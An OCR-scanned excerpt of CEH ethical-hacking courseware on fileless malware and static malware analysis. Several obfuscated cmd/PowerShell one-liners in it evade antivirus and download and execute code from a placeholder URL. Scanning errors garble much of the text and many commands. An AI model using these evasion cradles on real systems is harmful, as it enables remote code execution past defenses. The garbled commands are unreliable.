© Malware (i Seore=87)
Figure 7.68: Screenshot showing the detection of LemonDuck
Module 07 Page 1079
.
| Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Malware Threats
Exam 312-50 Certified Ethical Hacker
The following are some additional fileless malware: =
Divergent
=
njRat Backdoor
=
DarkWatchman
=
Sodinokibi Ransomware
=
BazarBackdoor
=
Kovter and Poweliks
=
Astaroth Backdoor
=
Dridex
=
Nodersok
=
Hancitor/Chanitor
=
Vaporworm
=
Sorebrect Ransomware
Module 07 Page 1080
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Fileless Malware
Antivirus
Obfuscation Techniques to Bypass
cE H
=
Inserting Characters
@ Attackers insert special characters such as comma(,) and semicolon (;) between malicious commands and strings to make well-known commands
more complex to detect
ysemd.exe,/c, ;,echo;powershell.exe -NoExit -exec bypass -nop Invoke-Expression(New-Object, System.Net.WebClient) .DownloadString( ‘https: //targetwebsite.com”) &&echo exit
Inserting Parentheses |@ When parentheses are used, variablesin a code block are evaluated as a single line command. Attackers exploit this feature to split and obfuscate malicious commands emd.exe /e ((echo commandl) Prag echo command2))
Inserting Caret Symbol @ The caret symbol (*) is a reserved character used in shell commands for escaping. Attackers exploit this feature to escape malicious commands during execution time
C:\WINDOWS\system32\cmd.exe /c p**o**w*ter*r**sr*h**erA1A1**.A@**x*M@ “NOMMERit “exec bypass -nop InvokeExpression (New-Object System.Net.WebClient). DownloadString ((*https://targetwebsite.com”) &&echo,exit Al Rights Reserved, Reproduction i
Fileless Malware
Antivirus (Cont’d)
Obfuscation Techniques to Bypass
cE H
om | ane
Inserting Double Quotes @ The commandline parser uses the double quote symbolas an argument delimiter. Attackers use this symbolto concatenate malicious commandsin arguments Pow""er""Shell -N””oExit -ExecutionPolicy bypass -noprofile -windowstyle hidden cmd /c Flower. jpg
Using Custom Environment Variables
@ Inthe Windows operating system, environmentvariables are dynamic objects that store modifiable values used by applications at runtime. Attackers exploit environmentvariables to split malicious commands into multiple strings set a=Power féset b=Shell ££ %a:~0,-18%b% -ExecutionPolicy bypass -noprofile -windowstyle hidden cmd /c Products .pdf Using Pre-assigned Environment Variables ©@ “scommonProgramFiles’” containsa defaultvalue “c:\program Files\Common Files”. Specific characters from this value can be accessed through indexingand used to execute malicious commands cmd.exe /c “%CommonProgramFiles:~3,1towerShell.exe” -windowstyle hidden -command wscript myscript.vbc Rights Reserved. Reproduction i
Fileless Malware Obfuscation Techniques to Bypass Antivirus Nowadays, attackers are leveraging fileless malware to perform cyber-attacks on target organization, as such malware hides itself from traditional antivirus solutions. Furthermore, fileless malware does not store anything on the disk; hence, it is extremely difficult to detect such attacks. In addition, attackers adopt various obfuscation techniques to keep their malicious activities hidden and undetected for as long as possible.
Module 07 Page 1081 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
The various obfuscation techniques used by fileless malware to bypass antivirus solutions are discussed below: Inserting Characters Attackers insert special characters such as commas (,) and semicolons (;) between malicious commands and strings to make well-known commands more difficult to detect. These special characters are considered as whitespace characters in commandline arguments; hence, they are processed easily. Using this technique, attackers break malicious strings to evade parsing of malicious commands by signature-based solutions. ,;emd.exe,/c,;,echo;powershell.exe
Invoke-Expression
-NoExit
-exec
bypass
-nop
(New-Object
System.Net.WebClient)
.DownloadString(‘https://targetwebsite.com”)
&&echo, exit
Inserting Parentheses In general scenarios, parentheses are used to improve the readability of the code, group complex expressions, and split commands. When parentheses are used, variables of a code block are considered and evaluated just as a single-line command. Attackers exploit this feature to split and obfuscate malicious commands. emd.exe
/c
((echo
command1)
&&( echo
command2) )
Inserting Caret Symbol The caret symbol (4) is generally a reserved character used in shell commands for escaping. Attackers exploit this feature to escape malicious commands at execution time. For this purpose, they insert single or double caret symbols inside a malicious command. C: \WINDOWS\system32\cmd.exe
P**04AWA*OAAEAASAAHASEAALAAL AS AAOAAKANG nop
Invoke-Expression
-NO**EXIt
(New-Object
-exec
bypass
Ie
-
System.Net.WebClient)
DownloadString((‘https://targetwebsite.com”)
.
&&echo,exit
When the above command is executed, the first caret symbol is escaped: Cc: \WINDOWS\system32\cmd.exe No*Exit -exec bypass
Ie -nop
protwre*r*s*h*e*1*1% Invoke-Expression
System.Net.WebClient) . DownloadString((‘https://targetwebsite.com”)
After the second caret symbol command-line argument:
is also escaped,
. *e*x*e (New-Object
&&echo,exit
powershell.exe
is executed
with
a
C:\WINDOWS\system32\cmd.exe /c powershell.exe -NoExit -exec bypass -nop Invoke-Expression (New-Object System.Net.WebClient) . DownloadString((‘https://targetwebsite.com”)
Module 07 Page 1082
&&echo,exit
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
=
Inserting Double Quotes
When a command is embedded with double quotes, it does not affect the normal execution of the command. Furthermore, the command-line parser uses a double quote symbol as an argument delimiter. Attackers use double quote symbols to concatenate malicious commands in arguments. Pow’”er””Shell -N’””oExit -ExecutionPolicy -windowstyle hidden cmd /c Flower.jpg
=
bypass
-noprofile
Using Custom Environment Variables Another method adopted by attackers to obfuscate fileless malware is using environment variables. In Windows operating systems, environment variables are dynamic objects that store modifiable values used by applications at run time. Attackers exploit environment variables to split malicious commands into multiple strings. Furthermore, they set the value for the environment variable at run time to execute malicious commands. set a=Power &&set b=Shell && bypass -noprofile -windowstyle
=
%a:~0,-1%%b% -ExecutionPolicy hidden cmd /c Products.pdf
Using Pre-assigned Environment Variables Another technique exploited by attackers is retrieving specific characters from preassigned environment variables such as “®CommonProgramFiles%.” The characters in such variables are referred through the index and exploited by attackers to execute malicious commands. “%CommonProgramFiles%” contains a default value “C:\Program
Files\Common
Files.”
Specific characters from this value can be
accessed through indexing and used to execute malicious commands as follows: cmd.exe
windowstyle
/e
“$CommonProgramFiles:~3,1%owerShell.exe”
hidden
-command
wscript
-
myscript.vbc
The above command retrieves a single character ‘P’ at index 3, which is concatenated with “owerShell.exe”, and executes the malicious command.
Module 07 Page 1083
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
CEH
LO#06: Demonstrate Malware Analysis Process
Copyright © by
Al RightsReserved, Reproduction
i Strictly Prohibited.
Malware Analysis Malware such as viruses, Trojans, worms, spyware, and rootkits allow an attacker to breach security defenses and subsequently launch attacks on target systems. Thus, to find and fix existing infections and thwart future attacks, it is necessary to perform malware analysis. Many tools and techniques are available to perform such tasks.
This section explains the malware analysis procedure and discusses the various tools used to accomplish it.
Module 07 Page 1084
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
What is Sheep Dip Computer?
CE H
‘@
Sheep dipping refers to the analysis of suspect files, incoming messages, etc. for malware
‘@
Asheep dip computer is installed with port monitors, file monitors, network monitors, and antivirus software and connects to a network only under strictly controlled conditions
Sheep Dipping
Process Tasks
Run user, group permission, and process monitors Run port and network monitors Run device driver and file monitors
Run registry and kernel monitors
What is Sheep Dip Computer? Sheep dipping is a process used in sheep farming, whereby sheep are dipped in chemical solutions to make them parasite-free. In information security and malware analysis, sheep dipping refers to the analysis of suspicious files, incoming messages, etc., for malware. The users isolate the sheep-dipped computer from other computers on the network to block any malware from entering the system. Before performing this process, it is important to save all downloaded programs on external media such as CD-ROMs or DVDs. A computer used for sheep dipping should have tools such as port monitors, files monitors, network monitors, and one or more antivirus programs for performing malware analysis of files, applications, incoming messages, external hardware devices (such as USB and pen drive), and so on. Some tasks that are typically run during the sheep dipping process are as follows: =
Run user, group permission, and process monitors
Run port and network monitors Run device driver and file monitors Run registry and kernel monitors
Module 07 Page 1085 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Antivirus Sensor Systems
CEH
@ Anantivirus sensor system is a collection of computer software that detects and analyzes malicious code threats such as viruses, worms, and Trojans @ They are used along with sheep dip computers Antivirus System
gees
on
Oo antivirus
Anti-Spyware
all
| Linker Info: [6.0 Subsystem: [Wind2Gur [3] | PEID v0.95
JARNING > VIRUS —> [Worm KLEZ [Overiay]] Mult'Scan_| [Task Viewer |
[Options
| [
About
™ Stay on top
Static Malware Analysis: Identifying Packing/Obfuscation Methods (Cont'd) Detect It Easy (DIE) is an application used for determininga file's
compiler, linker, packer, etc. using signature-based detection
|
|
Exit [|
Al Rights Reserved. Re
Identifying Packing/Obfuscation Method of ELF Malware
rd
-
| [>
|
https:/jwurw ale com
C | EH Pond tthe
Packaging/Obfuscation Tools Aa
Macro Pack
be
upx
roerrnstnie ASPack
“http://www.aspack.com
@
\VMprotect ‘etps:/ompsoft.com
ps2-packer ‘ets:/fothabs.com
Identifying Packing/Obfuscation Methods Attackers use packing and obfuscation to compress, encrypt, or modify a malware executable file to avoid detection. Obfuscation also hides the execution of the programs. When the user executes a packed program, it also runs a small wrapper program to decompress the packed file and then run the unpacked file. This complicates reverse engineers’ attempts to find out the actual program logic and other metadata via static analysis.
Module 07 Page 1101 :
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
You should try to determine if the file includes packed elements and also locate the tool or method used for packing it. Use tools such as PEid, which detects most commonly used packers, cryptors, and compilers for PE executable files. Finding the packer will ease the task of selecting a tool for unpacking the code. PEID
Source: https://www.aldeid.com PEID is a free tool that provides details about Windows executable files. It can identify signatures associated with over 600 different packers and compilers. This tool also displays the type of packers used for packing the program. It also displays additional details such as entry point, file offset, EP section, and subsystem used for packing.
PEID v0.95
-
x
File: | E:\CEH-Tools\CEHv12 Module 07 Malware Threats \Viruses \Klez Virus L [J]
Entrypoint: | 00008458
EP Section:
[text
File Offset:
FirstBytes:
[55,88,6C,6A
[00008458
Linker Info: [6.0
>]
| >|
Subsystem: {Win32 GUI
Multi Scan | | Task Viewer
Options
“About
M Stay on top
|
[>]
ext
|
[| [2] Figure 7.73: Screenshot of PEiD
Module 07 Page 1102
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Identifying Packing/Obfuscation Method of Executable and Linkable Format (ELF) Malware =
Detect It Easy (DIE)
Source: https://github.com DIE is an application used for determining types available for Linux and macOS. It has a completely can easily add its own algorithms for detecting detects a file’s compiler, linker, packer, etc. using a
of files. Apart from Windows, it is open architecture of signatures and or modifying existing signatures. It signature-based detection method.
Figure 7.74: Screenshot of the DIE tool
The following are some additional packaging/obfuscation tools:
=
Macro_Pack (https://github.com)
=
UPX (https://upx.github.io)
=
ASPack (http://www.aspack.com)
=
VMprotect (https://vmpsoft.com)
=
ps2-packer (https://github.com)
Module 07 Page 1103
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Static Malware Analysis: Finding the Portable Executables
(PE) Information
cE H
ol
|@ The PE formatisthe executable file formatused on Windows operating systems @ Analyze the metadata of PE files to get information suchas time and date of compilation, functions imported and exported by the program, linked libraries, icons, menus, version information, and strings that are embedded in resources |@ Use tools such as PE Explorer to extractthe above-mentioned information
PE Explorer PE Explorer lets you open, view, and edit a variety of different 32-bit Windows executable file types (also called PE files) ranging from the common,
such
as EXE, DLL, and ActiveX Controls
PE Extraction Tools
© Portable Executable Scanner (pescan) (https://tzworks.net) © Resource Hacker (http://www.angusj.com) © PEView (https://www.aldeid.com)
tt: funvu heaventols com
Finding the Portable Executables (PE) Information The Portable Executable (PE) format is an executable file format used on Windows OS, which stores the information that a Windows system requires to manage the executable code. It stores metadata about the program, which helps in finding additional details of the file. For instance, the Windows binary is in PE format, and it consists of information such as time of creation and modification, import and export functions, compilation time, DLLs, linked files, strings, menus, and symbols. The PE format contains a header and sections that store metadata about the file and code mapping in an OS. The PE of a file contains the following sections: =
.text: Contains instructions and program code that the CPU executes.
=
.rdata: Contains the import and export information as well as other read-only data used by the program.
=
data: Contains the program’s global data, which the system can access from anywhere.
=
.rsrc: Consists of the resources employed by the executable, menus, and strings, as this section offers multi-lingual support.
such
as icons,
images,
You can use the header information to gather additional details of a file or program, such as its features. You can use tools such as PEView to extract the above-mentioned information.
Module 07 Page 1104
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
=
PE Explorer Source: http://www.heaventools.com PE Explorer lets you open, view, and edit a variety of 32-bit Windows executable file types (also called PE files) ranging from common types, such as EXE, DLL, and Activex Controls, to less familiar types, such as SCR (Screensavers), CPL (Control Panel Applets), SYS, MSSTYLES, BPL, DPL, and more.
{G) PE Explorer - EACEH-Tools\CEHV12 Module 07 Malware Fle View Tools Help SHR Al Mea B-@ls|
Threats\Viruses\Klez Virus Live\face.exe |
-
a
x
°
ae
3 | Actes of Enty Pon: [OHSS] y | ReaimapeChecksun [OHT72IGR |] FieldName
DataVaue
Number of Sections a Tine Date Stamp 387868 Printer to Symbol Table 00000000 Number of Symbols cooon0ach Size of OpionalHeader——O0EOn Chaecteises o10Fh Masic 108 Linker Vetsion 00h Size of Code 000C000h Size of rialeed Data cooe900ch Size of Uriniazed Date 00000000e Addiess of Ent Point coda84sch Base of Code oonto0ch Base of Data eooeo000n Image Base cvo4ono00%
—Descipton
Feld Name Section lgnment Fe Alignment Operaing System Version Image Version Subsystem Version ‘Wind2 Version Value Size of mage Size of Headers Checksum Subsystem Di Characteristics Size of Stack Reserve Sie of Stack Commit Size of Heap Reserve Size of Heap Commit Loader Flags Numbet of Data Ditectees —
13/04/2002 01.48.44 a PER 60
DataVahe Deception oo0t000h ‘gonta00h 00000004h 40 on0v0g 00 coonogoth 40 9000000) © Reserved on0ge000h 614400 bytes ‘00001000h ‘ogen09eoh och ‘Wind2 GUI cooth ‘oovo0000h coota0oh ‘oovoo000h ‘gon1a00h (00000000 Obsolete ono000T0h
For Heb, press Fi Figure 7.75: Screenshot of PE Explorer
Some additional PE extraction tools are as follows: =
Portable Executable Scanner (pescan) (https://tzworks.net)
=
Resource Hacker (http://www.angusj.com)
=
PEView (https://www.aldeid.com)
Module 07 Page 1105 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Static Malware Analysis: Identifying File Dependencies |@ Programs need to work with internal system files to properly function in
@
Programs store the importand export functions the kernel32.dllfile
‘@
Check the dynamically linked listin the malware executable file
‘@
Findingoutall the library functions may allow you to
Dependency Walker Dependency Walker lists all the dependent modules of an executable
al diagrams. It also records all the file and builds hierarchictree functionsof each module exports and calls
estimate what the malware program cando
Use tools such as Dependency Walkerto identify the
dependencieswithin the executable file
weanegpepe|
‘@
CE H
© Dependency-check (https://jeremylong.github.io) © Snyk (https://snyk.io) © PE Explorer Dependency Scanner (http://www. peexplorer.com) © Retirels (https://retirejs.github.io)
‘BBSSEESt
Dependency Checking Tools
http://www dependencywalker.com
Identifying File Dependencies Any software program depends on various inbuilt libraries of an OS that help in performing specified actions in a system. Programs need to work with internal system files to function correctly. They store the import and export functions in a kernel32.dll file. File dependencies contain information about the internal system files that the program needs to function properly, the process of registration, and location on the machine. You need to find the libraries and file dependencies, as they contain information about the runtime requirements of an application. Subsequently, you need to check if they can find and analyze these files, as they can provide information about malware in a file. File dependencies include linked libraries, functions, and function calls. Check the dynamically linked list in the malware executable file. Finding out all the library functions may allow you to guess what the malware program can do. You should know the various dll used to load and run a program.
Some standard dlls are listed in the table below: dil
Description of contents
Kernel32.
str.txt
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
=
Analyzing String Reuse Using Intezer
Source: https://www.intezer.com Intezer is malware analysis platform that scans files, URLs, end points, and memory dumps. It extracts strings from uploaded malware samples and identifies whether those strings are used in other files. It reduces the effort of malware analysts by analyzing unknown malware that are difficult to trace.
Figure 7.82: Screenshot of Intezer showing relevant strings
Figure 7.83: Screenshot of Intezer showing string reuse
Module 07 Page 1115 :
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Static Malware Analysis: Analyzing Mach Object (Mach-O) Executable Files ‘@
Mach-O is an executable file format for macOS and iOS that is similarto the PE format for Windows and ELF for Linux
@ Use tools such as pagestuff, LIEF, or otool to analyze Mach-O malware |G Use pagestuffto view Mach-O executable files and find information regarding the logical pages associated with that file Malicious Mach-O Binaries
Reverse Engineering Mach-O Binaries
Al RightsReserved. Reproduction
Analyzing Mach Object (Mach-O) Executable Files Mach object (Mach-O) is an executable file format similar to the Portable Executable (PE) format for Windows and ELF for Linux. It is associated with binaries present in macOS and iOS. This file format is used to distribute code and determines the mechanism through which the memory reads both data and code present in a binary file. Mach-O malware has a direct impact on a program’s performance because memory usage and paging activities are affected by the order of code within a binary file. This malware allows attackers to generate two arrays, which get overlapped in memory, and to set a memory location for executing a Mach-O executable. Attackers can leverage this functionality for privilege escalation and for exploiting next-stage vulnerabilities with root access.
Malicious Mach-O Binaries Mach-O can be referred to as a binary stream of bytes that are combined to form meaningful data chunks. The data include information related to the CPU type, data size, order of the bytes, etc. Mach-O binaries are arranged into different segments that comprise individual sections. These individual sections store different types of code or data. Some of the segments of a Mach-O binary are | PAGEZERO, _ TEXT, _ DATA, and __OBUC. Attackers can use these segments to hide malicious code and execute it for escalating privileges. Security privilege or otool privilege
analysts must analyze Mach-O malware to take proper mitigative measures and restrict escalation attempts in macOS systems. Analysts can use tools such as pagestuff, LIEF, to analyze Mach-O malware and take the necessary actions for the prevention of escalation.
Module 07 Page 1116
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
=
LIEF
Source: https://lief-project.github.io LIEF is an acronym for Library to tool developed by QuarksLab for including Mach-O binary formats. languages such as C, C++, and executable formats.
Instrument Executable Formats. It is a cross-platform parsing and manipulating different executable formats In addition, it can be used in different programming Python and can abstract the common features of
Run the following commands to obtain information on a Mach-O executable: import
lief
binary
=
print
=
lief.parse("/usr/bin/1s")
(binary)
otool
Source: https://github.com Security analysts can use otool to analyze or examine a binary and obtain information about an iOS application. They can check the binary links with a shared library using the following command: otool
-L
UnPackNw
>
~/Malware/libs.txt
e@0e@
| MacOS —
-bash
2x31
Figure 7.84: Screenshot of otool
Execute the following command to dump the method names from the Obj section of a Mach-O binary: otool
-oV
UnPackNw
>
~/Malware/methods.txt
Run the following command to acquire the disassembly: otool
-tV
UnPackNw
>
~/Malware/disassembly.txt
After executing the above command, the obfuscated file name can be found.
Module 07 Page 1117
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Malware Threats
99000001000015TF 9900000100001606 9900000100001609 900000010000160T 900000100001616 00000010000161d
Exam 312-50 Certified Ethical Hacker
m
Ox96ea(%rip), %rax, ri *0x7a99(%rip) @x7daa(%rip), @x7dc3(%rip), 0x96d4(Krip),
Srsi
Objc
selector
## Objc wrsi ## Srdi ## rex ##
message:
ref:
+[NSBundle
mainBundle mainBundlell
Objc cfstring ref: @"unpack" Objc cfstring ref: @"txt” Objc selector ref: pathForResource:ofType
900000100001624 9900000100001628
Srdi, %rax,
090000010000162F 9900000100001632 0900000100001636 00000010000163a 9000000160001640 900000100001646 900000100001649 990000010000164c 9900000100001650 9000000100001657 900000010000165b
%rcx, rsi -@x38(%rbp), %rdx -@x36(%rbp) , rex *@x7a68(%rip) ## Objc message: -[%rdi pathForResource:ofType:] $0x4, %r8d %r8d, %ecx %r8d, %r8d %rax, -0x20(%rbp) Ox9a51(Krip), %rax ## Objc class ref: _OBJC_CLASS_$_NSString -@x26(%rbp), %rdx 0x969e(Krip), %rsi ## Objc selector ref: stringWithContentsOfFi
000000010000162b
le:encoding:error
Srsi,
-0x30(%rbp) %rdi
-0x38 (%rbp)
000000100001662 900000100001665
%rax, %rdi "@x7a3d(%rip)
990000010000166b
S%rax,
900000100001676 00000010000167a 000000100001681 900000100001684
-@x28(%rbp) , rdx 0x9687(%rip), Sersi wt Objc selector ref: enncryptDecryptString: %rax, Srdi *Ox7ale(%rip) ## Objc message: +[EncodeDecodeOps enncryptDecryp
ile:encoding:error:]
@09909010000166F
tString:]
## Objc message:
+[NSString stringwithContentsOfF
-0x28 (%rbp) Ox9a3a(Krip), %rax ## Objc class ref:
EncodeDecodeOps
Figure 7.85: Screenshot of otool showing an obfuscated text file and its contents
The output of the above command can be examined line by line to analyze actual file contents and encryption methods used. Reverse Engineering Mach-O Binaries
As Mach-O binaries include different segments and their corresponding sections, security analysts must evaluate the internal structure of a binary for the identification of malicious code. Furthermore, all the methods and executable files present within the segments can be examined through the reverse engineering process to mitigate potential threats. Mach-O binary files can be analyzed using tools such as pagestuff. =
pagestuff
Source: https://github.com The pagestuff utility can be used to view Mach-O executable files and find information regarding the logical pages associated with those files. This tool has limited input parameters. Symbols such as static data structure names and functions can be viewed for individual pages of code. If no coding pages are specified, then the tool displays the symbols for all the pages within the _ TEXT, —text section. It helps identify malicious code and Objective-C methods such as deleteAppBySelf.
Module 07 Page 1118
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Run the following command to view the internal structure of binaries: pagestuff
UnpackNw
-a
Execute the following command to view segment and section names: nm
-m
UnpackNw
File Page @ contains Mach-0 headers
File Page 1 contains contents of section
(__TEXT,_ text)
File Page 2 contains contents of section
(_TEXT,
Symbols on file page 0x8800000109001579 0x@0000001090015a9 0x@0G90001080016e0 0x@000000109001790 0x@000000108001870 0x@909000100001aa0 0x@000000100001d70 0x@909000100001eD
1 virtual address @x100001570 to 6x190802000 _main -[AppDelegate applicat ionDidFinishLaunching:] -[AppDelegate deleteAppBySelf] -[AppDelegate deletPreviosApp] -[AppDelegate creatFileOnTemp: scrpName:} -[AppDelegate makeExecutableFileAtPath:] -[AppDelegate executeAppleScript: isKill:] __41-(AppDelegate executeAppleScript: isKill:]_block_invoke text)
Symbols on file page 2 virtual address @x100002000 to 6x190003000 0x@009000109002030 __41-(AppDelegate executeAppleScr ipt: isKill:]_block_invoke_2 0x@880000108002678 __copy_helper_block_ 0x@9000001000020a9 destroy _helper_block_ @x99@90001080020de __copy_helper_block_.119
0x@8G0000108002138 0x@909000109002170 0x@8800001000023b9 0x@900000108002610 0x8000000100002840 0x@0890001080028cO 0x900000100002b60 0x@800000109002ca9 0x@909000109002de9 0x@000000100002e30
_ _destroy_helper_block_.120 -[AppDelegate ReadPrefrance:] -[AppDelegate ReadPrefrance] -[AppDelegate checkOurOfferInstlled} -[AppDelegate osVersion] -[AppDelegate getPathFromAdobPlist:] -[AppDelegate fireTrackOffersInstalledForPXL:] -[AppDelegate fireTrackOffersAcceptedForPXL:] -[AppDelegate silentyTrackInMain:] -[AppDelegate silentlyFireUrl:]
File Page 3 contains contents of section
(_TEXT,
text)
Figure 7.86: Screenshot of pagestuff showing segments and sections
Module 07 Page 1119
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Static Malware Analysis: Analyzing Malicious MS Office Documents
cE H ol
Finding Suspicious Components @ Analyze the malicious Office document with oleid to detect any specific components that can be labeled as malicious/suspicious @
To use oleid, open a new terminal on the linux (Ubuntu) workstation and enter oleid
document>’
‘
C:\Windows\System32\drivers
@ Check boot.ini or bed (bootmer) entries @ Check Windows services that are automatically started > Goto Run > Type services.msc -> Sort by Startup Type @ Check the startup folder >
C:\ProgramData\Microsoft\Windows\start
Menu\Programs\startup
‘https: //docs. microsoft.com
Startup Programs Monitoring Malware can alter the system settings and add themselves to the startup menu to perform malicious activities whenever the system starts. Therefore, scanning for suspicious startup programs manually or using startup program monitoring tools such as Autoruns for Windows is essential for detecting malware. Steps to manually detect hidden malware: =
Step 1: Check startup program entries in the registry Startup items such as programs, shortcuts, folders, and drivers are set to run automatically at startup when users log into a Windows OS (e.g., Windows 11). Startup items can be added by the programs or drivers installed, or manually by the user. Programs that run on Windows 11 startup can be located in these registry entries, such as Windows startup setting, Explorer startup setting, and IE startup setting. o
Windows Startup Setting HKEY_LOCAL_MACHINE\SOFTWARE \Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
Module 07 Page 1136
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
o
Explorer Startup Setting HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore xr\Shell
Folders,
Common
Startup
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore x\User
Shell
Folders,
Common
Startup
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer \Shell
Folders,
Startup
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer \User
co
Shell
Folders,
Startup
IE Startup Setting
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\URLSearchHooks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet
Explorer\Toolbar
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet
Explorer\Extensions
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet =
Explorer\MenuExt
Step 2: Check device drivers automatically loaded Navigate to
C: \Windows\System32\drivers
to check the device drivers.
‘TD drivers
Ped NL Sort
Windows >
Ye Quick access
Gl Desktop Downloads
Documents WR Pictures O Music Ei Videos @ OneDrive y Wi Thispc
> ll Desktop Documents & Downloads
> @ Music WR Pictures 426 items
Name
= view
m32_> drivers
Search driver
Date modified
‘Ti DriverData
6/5/2021 5:10
Type AM
Size
File folder
‘Then-us
File folder
Mete
File folder
‘Si umoF
File folder
‘Tawd B) 3waresys
File folder System file
105 KB
[S) 13940hci.sys
System file
288KB
System file
818 KB
[ AcpiDev.sys
System file
52KB
8) acpiex.sys
System file
161 KB
System file
44KB
System file
48 KB
System
file
43 KB
System file
684 KB
B acpisys
27
IB acpipage.sys
B) acpipmisys DB acpi: B) Acx01000.ys
System file
8) adpaOxx.sys
Figure 7.97: Screenshot displaying drivers folder
Module 07 Page 1137
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
=
Step 3: Check boot. ini or bcd (bootmgr) entries Check boot.ini or bcd (bootmgr) entries using the command prompt. Open command prompt with administrative privileges, type bcdedit, and press Enter to view all the boot manager entries. BH Administrator: Command Prompt
-
a
x
Figure 7.98: Screenshot displaying boot info =
Step 4: Check Windows services that start automatically Go to Run > Type services.msc and press Enter. Sort the services by Startup Type to check the Windows services list for services that automatically start when the system boots.
Module 07 Page 1138
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Services
-
File Action View Help
o
x
Startup Type
Log
Manual
Loc:
¢9\m\S3\Bm|>>aup
Services (Local) [oo Senices(loc)
Select an item to view its description.
Name
°
Description
Status.
‘PActiver installer (AxlnstSV) Provides Us. ‘GhAdobe Acrobat Update Sere. Adobe Acro... Running ‘QhAgent Activation Runtime... Runtime for. ‘GhAlloyn RouterService —_—Router Allo. ‘GhApp Readiness
Gets apps re.
‘GyBitLocker Drive Encryption...
BDESVC hos..
‘Application Host HelperSer... Provides ad. ‘GhApplcation Identity Determines. ‘GhApplcation information Facilitates... ‘GhApplcstion Layer Gateway... Provides su.. ‘QhApplcation Management Processesin QLAPPX Deployment Service... Provides inf... ‘hAssignedAccessManagerSe...AssignedAc.. ‘QAuto Time Zone Updater Automat QLAVCTP service Thisis Audi... ‘Background Inteligent Tran... Transferfil ‘Background Tasks infrastruc... Windows in... ‘©hBase Filtering Engine TheBaseFil..
Manual Automatic Manual Manual (Tig...
Running Automatic Manual (ig... Running Manual (ig... Manual Manual Running Manual (ig... Manual (rig... Disabled Running Manual (ig... Manual Running Automatic Running Automatic
Loc | Loc: Loc: Loc
Loc: Loc: Loc: Loc: Loc: Loc: Loc: Loc: Loc: Loc: Loc: Loc:
Manual (Trig... Loci
